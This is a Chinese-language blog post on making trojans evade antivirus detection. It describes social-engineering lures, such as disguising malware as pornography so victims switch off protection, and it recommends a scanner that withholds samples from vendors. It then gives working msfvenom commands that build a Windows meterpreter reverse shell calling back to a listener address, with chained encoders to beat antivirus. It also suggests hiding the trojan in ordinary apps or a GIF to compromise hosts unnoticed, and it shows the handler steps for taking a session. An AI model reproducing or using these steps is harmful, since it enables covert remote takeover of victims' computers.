HOME> 限时活动> 木马免杀

木马免杀

2025-09-29 23:59:15

深度解密木马免杀流程恶意软件简介RAT是一个可以在目标计算机上安装服务器组件的,后面我们把恶意软件统称为RAT.当攻击者使用了各种技术对目标计算机进行注入测试,都无法突破对方的网络边界的时候人往往需要主动出击,这种渗透方式对目标发起攻击,比如我们向目标发个含有后门的杩程序,或者是个word文档pdf文件。想要达到效果同时也要利用好社会工程学,来诱骗受害者执行恶意程序。

一般我们生成的恶意程序都会 被检测,所以我们所设计的恶意软件可以利用人的劣根悭,比如我们将恶意软件或网站伪装成色情软件或网站,这样目标会认为他本身就是不好的软件被安全软件检测是很正常的事情,如果他安耐不住关闭安全防护软件执意要运行恶意程序,那么他就中招了。当然这种取巧的办法并有时候不能解决所有问题,所以我们就需要利用免杀来躲避安全软件的查杀。

恶意软件功能恶意软件种类有病毒, 木马,蠕虫,键盘记录,僵尸程序,流氓软件,勒索软件,广告程序。在用户非自愿的情况下执行安装,出于某种恶意的目的。例如控制,窃取, 勒索,偷窥,推送,攻击等,当电脑一旦中了恶意木马病毒后,就会变成它们的肉鸡,可以用中木马的计算机向另外-个电脑进行攻击,发送大流量,大井发,就相当于变成攻击别人的一个武器, 一个跳板, 一个打手,被控制的僵尸主机。也可以定期给肉鸡推送广告,博彩等。

防病毒软件简介防病毒软件是-种计算机程序,也称为AV软件,当然此AV非彼AV。可以对计算机进行检测、防护,井采取行动来解除或删除恶意软件程序。防病毒软件都安装在个人用户,公司办公电脑,机房等。防病毒软件从DOS和win3.x时代就开始流行,那时候的病毒可能只是几行简单的代码,不过破坏力却是不可小视的。说到病毒.其实它和其它普通的程序没什么不同,所不同的只是它们的立场, 一个是保护,一个是破坏,仅此而已。

防病毒软件工作原理第一种:就是扫描病毒程序本身的特征码,然后与杀毒软件的病毒库中的特征码进行比对。如果在病毒库中找到了-样的特征码 ,就说明它是个病毒。最后总结得出杀毒软件都是基于黑名单检测判断, 然而最新的病毒出来后,杀毒软件的病毒库并没有它的特征码,这个时间段的病毒就是免杀。当该病毒造成一定破坏时,杀毒软件维护人员就会在多个渠道采集病毒的二进制特征码,采集成功添加到病毒库后,该病毒就被成功遏制住。

第二种:启发式的工作原理,也就监控程序的行为。观察程序是不是把自己添加到了开启启动项了,是不是自动修改了注册表,是不是屏蔽了任务管理器,禁用了一些程序,是不是做了隐藏处理,是不是改了一些特殊文件,又或者生成了新的执行文件。如果它具备了这里面的举动,就会被定性为木马程序,所以就存在误杀和漏杀,因此启发式检测技术有待完善。

防病毒软件引擎单一AV厂商的病毒库很难达到100%覆盖,每个厂家都有自己的优势和自己的缺点。但咱们不能同时装两个以上杀毒软件,那样计算机就会很卡,程序跑起来很吃力。下面的两个站点和多个杀毒软件厂 商做了对接,可以直接在上面扫描咱们的程序,是不是安全的。

这两个网站时目前使用最多的杀毒引擎,它会把扫描的信息给所有的防病毒软件厂商。有的防病毒软件公司,都懒的维护自己的病毒库了,或者说根本就没有自己的病毒库,直接和virustotal签个协议,然后对外宣称自己是云查杀,我们投入巨大,有多少工程师在维护,实际上投入很少,也不用更新,就是用的人家免费的东西。

​ https://www.virustotal.com/​ http://www.virscan.org/

下面网站是搞黑的常用查杀引擎,它们和上面两款的主要区别是,扫描出的的结果不会提供给杀毒软件厂商,因此杀毒软件就没法提取病毒的特征码,进而可以维持免杀效果。需要科学上网再进行使用。​ https://nodistribute.com/

制作免杀并验证msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序进行加密后,并在目标机上执行,在本地监听上线。一句话总结,生成shell,加密shell。

普通木马

输入命令

1msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.235.145 LPORT=4444 -f exe -o /root/a.exe

将生成的木马程序传至Win10主机中,发现立马被腾讯管家查杀了,一秒都没存活

免查杀木马

输入命令

1msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.235.145 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 10 | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 10 -b '\x00'-f exe -o /root/b.exe

发现此木马程序已经免查杀了

这里我们可以将免查木马绑定在正常的app的小插件里,就可以做到在不知不觉的情况下入侵别人的主机

这里就使用一个gif分离器,将木马藏入其中

输入命令

1msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.235.145 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 10 | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 10 -b '\x00'-f crackme.exe -o /root/crackme1.exe

这里我用win10主机打不开该程序,说是版本不对,那版本不对就没法接下来的验证木马,渗透进主机了

验证木马

启动msf输入命令使用/multi/handler模块

1use exploit/multi/handler

启动后门攻击监听

1exploit -j

当靶机点击后门程序.exe后,kali监听到session, 进行拿权

1sessions -i 1

然后就拿到了 meterpreter 命令行